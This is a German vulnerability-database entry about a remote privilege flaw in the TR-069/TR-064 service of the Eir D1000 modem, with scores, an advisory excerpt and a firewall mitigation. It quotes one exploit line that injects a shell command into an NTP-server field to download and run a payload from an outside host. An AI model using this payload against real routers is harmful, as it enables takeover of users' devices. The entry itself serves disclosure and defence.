| CVSS Meta Temp Score | Aktueller Exploitpreis (≈) | CTI Interest Score |
|---|---|---|
| 9.6 | $0-$5k | 0.00 |
Eine sehr kritische Schwachstelle wurde in Eir D1000 Modem entdeckt. Dies betrifft ein unbekannter Teil der Komponente TR-069. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Klassifiziert wurde die Schwachstelle durch CWE als CWE-269. Das hat Auswirkungen auf Vertraulichkeit, Integrität und Verfügbarkeit.
Die Schwachstelle wurde am 07.11.2016 durch kenzo2017 als Eir’s D1000 Modem Is Wide Open To Being Hacked. in Form eines bestätigten Advisories (Website) veröffentlicht. Das Advisory kann von devicereversing.wordpress.com heruntergeladen werden. Die Herausgabe geschah hierbei ohne Zusammenarbeit mit dem Hersteller. Die Schwachstelle ist relativ beliebt, was unter anderem auf ihre geringe Komplexität zurückzuführen ist. Der Angriff kann über das Netzwerk passieren. Das Ausnutzen erfordert keine spezifische Authentisierung. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet (Preisberechnung vom 13.06.2019). Das MITRE ATT&CK Projekt deklariert die Angriffstechnik als T1068. Das Advisory weist darauf hin:
What is not very well known is that the server on port 7457 is also a TR-064 server. This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.Ein öffentlicher Exploit wurde in Python umgesetzt und sofort nach dem Advisory veröffentlicht. Der Exploit wird unter devicereversing.wordpress.com zur Verfügung gestellt. Er wird als hoch funktional gehandelt. Als 0-Day erzielte der Exploit wohl etwa $25k-$100k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
<NewNTPServer1> `cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1` </NewNTPServer1>
Die Schwachstelle kann durch das Filtern von tcp/7547 (tr-069) mittels Firewalling mitigiert werden.
Ein Bericht in deutscher Sprache wird unter anderem durch Heise bereitgestellt. Die Einträge 101422 sind sehr ähnlich.
Betroffen
- Telekom Speedport Modem
Produkt
Hersteller
Name
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
CVSSv3
VulDB Meta Base Score: 9.8VulDB Meta Temp Score: 9.6
VulDB Base Score: 9.8
VulDB Temp Score: 9.6
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vektor | Komplexität | Authentisierung | Vertraulichkeit | Integrität | Verfügbarkeit |
|---|---|---|---|---|---|
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍
Exploiting
Klasse: Erweiterte RechteCWE: CWE-269 / CWE-266
ATT&CK: T1068
Lokal: Nein
Remote: Ja
Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Hoch funktional
Programmiersprache: 🔍
Download: 🔍
Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍
| 0-Day | freischalten | freischalten | freischalten | freischalten |
|---|---|---|---|---|
| Heute | freischalten | freischalten | freischalten | freischalten |
Threat Intelligence
Interesse: 🔍Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍
Gegenmassnahmen
Empfehlung: FirewallStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Firewalling: 🔍
Timeline
07.11.2016 🔍07.11.2016 🔍
30.11.2016 🔍
13.06.2019 🔍
Quellen
Advisory: Eir’s D1000 Modem Is Wide Open To Being Hacked.Person: kenzo2017
Status: Bestätigt
Heise: 3507134
scip Labs: https://www.scip.ch/?labs.20161013
Siehe auch: 🔍
Eintrag
Erstellt: 30.11.2016 12:05Aktualisierung: 13.06.2019 06:43
Anpassungen: 30.11.2016 12:05 (52), 13.06.2019 06:43 (1)
Komplett: 🔍
Bisher keine Kommentare. Sprachen: de + en.
Bitte loggen Sie sich ein, um kommentieren zu können.